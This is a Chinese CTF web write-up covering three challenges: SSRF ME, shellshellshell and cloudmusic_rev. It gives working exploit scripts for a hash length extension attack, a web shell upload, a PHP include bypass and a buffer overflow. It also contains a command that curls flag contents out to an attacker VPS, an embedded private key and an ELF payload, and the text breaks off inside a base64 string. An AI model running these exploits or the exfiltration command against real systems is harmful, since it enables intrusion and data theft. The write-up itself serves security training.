0x01 SSRF ME
這題沒什么難度恐锦,就不多說了椿浓,根據(jù)代碼邏輯構(gòu)造hash拓展攻擊使碾,坑的就是找flag找了半天底洗,找到了然后放提示了......直接貼代碼
# -*- coding: utf-8 -*-
import requests
import hashpumpy
import urllib.parse as change
readfile = 'flag.txt'
url1 = 'http://139.180.128.86/geneSign?param=' + readfile
req = requests.get(url = url1)
sign = req.content
hash_sign = hashpumpy.hashpump(sign, readfile + 'scan', 'read', 16)
sign_next = hash_sign[0]
action_next = change.quote(hash_sign[1][len(readfile):])
url2 = 'http://139.180.128.86/De1ta?param='+readfile
result = requests.get(url = url2, cookies={'sign': sign_next, 'action': action_next})
print(result.content)
0x02 shellshellshell
第一層登錄和去年的N1ctf的easyphp源碼基本一樣的款筑,所以漏洞點也是基本一樣的智蝠,github上有人寫了easyphp的漏洞利用腳本https://github.com/rkmylo/ctf-write-ups/tree/master/2018-n1ctf/web/easy-php-540,可以用ssrf腳本抓取到admin用戶的session
直接利用session登錄admin用戶奈梳,題目在admin用戶的上傳點沒有做限制杈湾,可以上傳任意文件,所以直接上傳一個shell就好攘须。
而且在上傳點提示了flag在內(nèi)網(wǎng)里漆撞,所以上傳個shell后目的也很明確,去看一下/etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.18.0.3 df459fa2cbad
有一個172.18.0.3的內(nèi)網(wǎng)地址于宙,所以搭個代理出來掃描一下C段地址(強烈安利一波FCN)浮驳,掃描到172.18.0.2上開了80端口,上來就是一個代碼審計
<?php
$sandbox = '/var/sandbox/' . md5("prefix" . $_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);
if($_FILES['file']['name'])
{
$filename = !empty($_POST['file']) ? $_POST['file'] : $_FILES['file']['name'];
if (!is_array($filename))
{
$filename = explode('.', $filename);
}
$ext = end($filename);
if($ext==$filename[count($filename) - 1])
{
die("try again!!!");
}
$new_name = (string)rand(100,999).".".$ext;
move_uploaded_file($_FILES['file']['tmp_name'],$new_name);
$_ = $_POST['hello'];
if(@substr(file($_)[0],0,6)==='@<?php')
{
if(strpos($_,$new_name)===false)
{
include($_);
}
else
{
echo "you can do it!";
}
}
unlink($new_name);
}
else
{
highlight_file(__FILE__);
}
emmmm捞魁,以前pwnhub的一個原題至会,上海賽又用了一次,貼下wp的地址:https://cloud.tencent.com/developer/article/1360551谱俭,跟著wp操作就可以上傳一個shell.php奉件,然后包含就可以Getsgell了宵蛀,最后在/etc下找到了flag
0x03 cloudmusic_rev
這個題目的1.0版本再國賽總決賽題中有放出,該題為2.0版本县貌,所以攻擊流程和原題差不太多术陶,參考:https://github.com/impakho/ciscn2019_final_web1。
相比國賽總決賽增加了‘.php’的過濾煤痕,但是返回值給了提示urlencode梧宫。urlencode編碼后再base64編碼,成功繞過摆碉,可以實現(xiàn)任意文件讀取塘匣。
并且上傳溢出admin密碼的長度變了,之前是0x300兆解,現(xiàn)在是0x70馆铁。
所以在原題的exp基礎(chǔ)上修改溢出長度
def upload_music():
url = site_url + '/hotload.php?page=upload'
data = {'file_id': '0'}
music = preset_music[:0x6] + '\x00\x00\x03\x00' +preset_music[0x0a:0x53]
music += '\x00\x00\x03\x00' + '\x00\x00\x03' + 'a' * 0x70 + '\x00'
files = {'file_data': music}
if logging: print(url)
if logging: print(data)
res = post(1, url, data, files)
if logging: print(res.text)
if '"status":1' in res.text:
try:
return b64decode(json.loads(res.content.strip())['artist'])[:16]
except:
return ''
return ''
溢出得到admin用戶的密碼:Mike84eiNxHcMVCz跑揉,查看firmware.php代碼
<?php
if (!isset($_SESSION['user'])||strlen($_SESSION['user'])<=0){
ob_end_clean();
header('Location: /hotload.php?page=login&err=1');
die();
}
if ($_SESSION['role']!='admin'){
$padding='Lorem ipsum dolor sit amet, consectetur adipisicing elit.';
for($i=0;$i<10;$i++) $padding.=$padding;
die('<div><div class="container" style="margin-top:30px"><h3 style="color:red;margin-bottom:15px;">Only admin is permitted.</h3></div><p style="visibility: hidden">'.$padding.'</p></div>');
}
if (isset($_FILES["file_data"])){
if ($_FILES["file_data"]["error"] > 0||$_FILES["file_data"]["size"] > 1024*1024*1){
ob_end_clean();
die(json_encode(array('status'=>0,'info'=>'upload err, maximum file size is 1MB.')));
}else{
mt_srand(time());
$firmware_filename=md5(mt_rand().$_SERVER['REMOTE_ADDR']);
$firmware_filename=__DIR__."/../uploads/firmware/".$firmware_filename.".elf";
if (time()-$_SESSION['timestamp']<3){
ob_end_clean();
die(json_encode(array('status'=>0,'info'=>'too fast, try later.')));
}
$_SESSION['timestamp']=time();
move_uploaded_file($_FILES["file_data"]["tmp_name"], $firmware_filename);
$handle = fopen($firmware_filename, "rb");
if ($handle==FALSE){
ob_end_clean();
die(json_encode(array('status'=>0,'info'=>'upload err, unknown fault.')));
}
$flags = fread($handle, 4);
fclose($handle);
if ($flags!=="\x7fELF"){
unlink($firmware_filename);
ob_end_clean();
die(json_encode(array('status'=>0,'info'=>'upload err, not a valid elf file.')));
}
ob_end_clean();
die(json_encode(array('status'=>1,'info'=>'upload succ.')));
}
}else{
if (isset($_SERVER['CONTENT_TYPE'])){
if (stripos($_SERVER['CONTENT_TYPE'],'form-data')!=FALSE){
ob_end_clean();
die(json_encode(array('status'=>0,'info'=>'upload err, maximum file size is 1MB.')));
}
}
}
@$path=$_POST['path'];
function clean_string($str){
$str=str_replace("\\","",$str);
$str=str_replace("/","",$str);
$str=str_replace(".","",$str);
$str=str_replace(";","",$str);
return substr($str,0,32);
}
if (isset($path)){
$path=clean_string(trim((string) $path));
if (strlen($path)<=0||strlen($path)>64){
ob_end_clean();
die(json_encode(array('status'=>0,'info'=>'Format or length check failed.')));
}else{
$firmware_filename=__DIR__."/../uploads/firmware/".$path.".elf";
if (!file_exists($firmware_filename)){
ob_end_clean();
die(json_encode(array('status'=>0,'info'=>'File not found.')));
}else{
try{
$elf = FFI::cdef("
extern char * version;
", $firmware_filename);
$version=(string) FFI::string($elf->version);
if ($version === "cloudmusic_rev"){
ob_end_clean();
die(json_encode(array('status'=>1,'info'=>'Firmware version is cloudmusic_rev.')));
}else{
ob_end_clean();
die(json_encode(array('status'=>0,'info'=>'Bad version.')));
}
}catch(Error $e){
ob_end_clean();
die(json_encode(array('status'=>0,'info'=>'Fail when loading firmware.')));
}
}
}
}
?>
其中相較于1.0锅睛,代碼中上傳后文件名的命名方式變了
$firmware_filename=md5(mt_rand().$_SERVER['REMOTE_ADDR']);
即用時間和公網(wǎng)IP地址的MD5值來生成文件名,并且固件被加載后历谍,執(zhí)行內(nèi)容不會返回现拒。所以需要利用curl講執(zhí)行結(jié)果帶出到vps上。修改原題中的exp:
#!/usr/bin/python2
#coding:utf-8
from sys import *
from base64 import *
from Crypto.PublicKey import RSA
import requests
import string
import time
import hashlib
import random
import json
from datetime import datetime
timeout = 1.0
retry_count = 5
logging = 1
site_url = ''
s = requests.session()
time_zone_offset = 60 * 60 * 8
command = "curl http://[your vps]/`/usr/bin/tac /fl*g*`"
# command = "ls"
preset_key = b64decode('LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk1JSUNkd0lCQURBTkJna3Foa2lHOXcwQkFRRUZBQVNDQW1Fd2dnSmRBZ0VBQW9HQkFPTWp4eXVIcWRuSmFyUDAKSHl1eFVVRHkvY1BGaWMzYjM5WUQrVzY5R2VSRkpMRDUraFhaM3lYMTFBQ2pMSHpESFpIbGgrajRQZncxdEhMMApwY3FPZmJ0TTF4am5sV2FKd3lZQzRpWlBSRXJUTGNVd282UmhKS2diUkxHQVpLUmxmWFFMbVRwbGd0ZnJoUGhJCng0ZzM2ZEtLTVVlYjZnOHJ3blVrUnVYSVlhd2hBZ01CQUFFQ2dZRUEwUWZrQzFOV0pHOFFHM3ZXRThlakZ6cUgKL3RxVDd6Y2h6enJwR2RnOU02M09EbkIramcxckp1d01wbW1FVDJ6Z2tadkNiOHZFZjQ2TStoM2JWWVc4Zmg1Zwp4dTlXdmJFb0orUGZtV2R6SmowUlRYT05vZXVzRUgwODI3eGl6UXlIc21RbkNBQzkyUS9IQlg4WVl0eDgxN0pOCnNIUmNFMHdacVFmL0dkU0VnK0VDUVFEMGVjUlJYN3BsT0hTOHNjTjFqT3FOMEl5S2pvamljWWNQL2h3ckU2ZjIKZGR3dEpnNlJBb3E3SHlRdUFjYmZCazJwdS9UeDRsSHRycm9qRXlxQTRLdjdBa0VBN2RqUEFCakEvaHlpV1oxTQpDUm5DTTRudWdDUEE1SXRxZktzb3UvbE51cUdYZXFVYW5XNjBTcmJDVWJrM2g2NnkwdXV2T0xzendEWllONnNNClFEWFJrd0pBUlB3N1BtOFJ6TkF5ZUxCOHBDWUFaY1lNY21pb0RhWFZZOWpqbi9BcS9Ddmoxa1dmNUtGZi9rOWEKU1RVdEplL0VhSG5tTTM4V2VVaE5zK29MbTFSS2t3SkFNcCtyNTJ4ZFgzaSt3VzR1YWQxMnJUdVZiT2F2UHJYQgowNGttb1dPOXZKUjZSbHR2MzhSWlVYRzJ5R2d3dm90YmVuTTVsMHlaQmpkSzdZWlZsREVnU3dKQkFMb29yYmZnCkJzMW5BbGU3WnhXK0JkRXlLVG9ZUWdWVU1MRytWeDFITW9rU0dZNlh6blNFYzdpK25weFBoeGd6Q1VWdHpxNU4KR3E4Q3ppN2FJUFVuY0lnPQotLS0tLUVORCBQUklWQVRFIEtFWS0tLS0tCg==')
preset_music = b64decode('SUQzBAAAAAABBFRSQ0sAAAADAAADMQBUSVQyAAAAEgAAA2JiYmJiYmJiYmJiYmJiYmIAVEFMQgAAABIAAANjY2NjY2NjY2NjY2NjY2NjAFRQRTEAAAASAAADYWFhYWFhYWFhYWFhYWFhYQA=')
preset_firmare = b64decode('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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEiD7AhIiwXVLwAASIXAdAL/0EiDxAjDAAAAAAAAAAAA/zXiLwAA/yXkLwAADx9AAP8l4i8AAGgAAAAA6eD/////JdovAABoAQAAAOnQ/////yXSLwAAaAIAAADpwP////8lyi8AAGgDAAAA6bD/////JYIvAABmkAAAAAAAAAAASI09wS8AAEiNBbovAABIOfh0FUiLBT4vAABIhcB0Cf/gDx+AAAAAAMMPH4AAAAAASI09kS8AAEiNNYovAABIKf5Iwf4DSInwSMHoP0gBxkjR/nQUSIsFFS8AAEiFwHQI/+BmDx9EAADDDx+AAAAAAIA9aS8AAAB1L1VIgz32LgAAAEiJ5XQMSIs9Ki8AAOhd////6Gj////GBUEvAAABXcMPH4AAAAAAww8fgAAAAADpe////1VIieVIg+wQSIsFpC4AAEiLALowAQAAvgAAAABIicfo9/7//0iNNaAOAABIjT2hDgAA6PT+//9IiUX4SIN9+AB0MUiLBWouAABIiwBIi1X4SInRugABAAC+AQAAAEiJx+iW/v//SItF+EiJx+ia/v//6wGQycMASIPsCEiDxAjDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA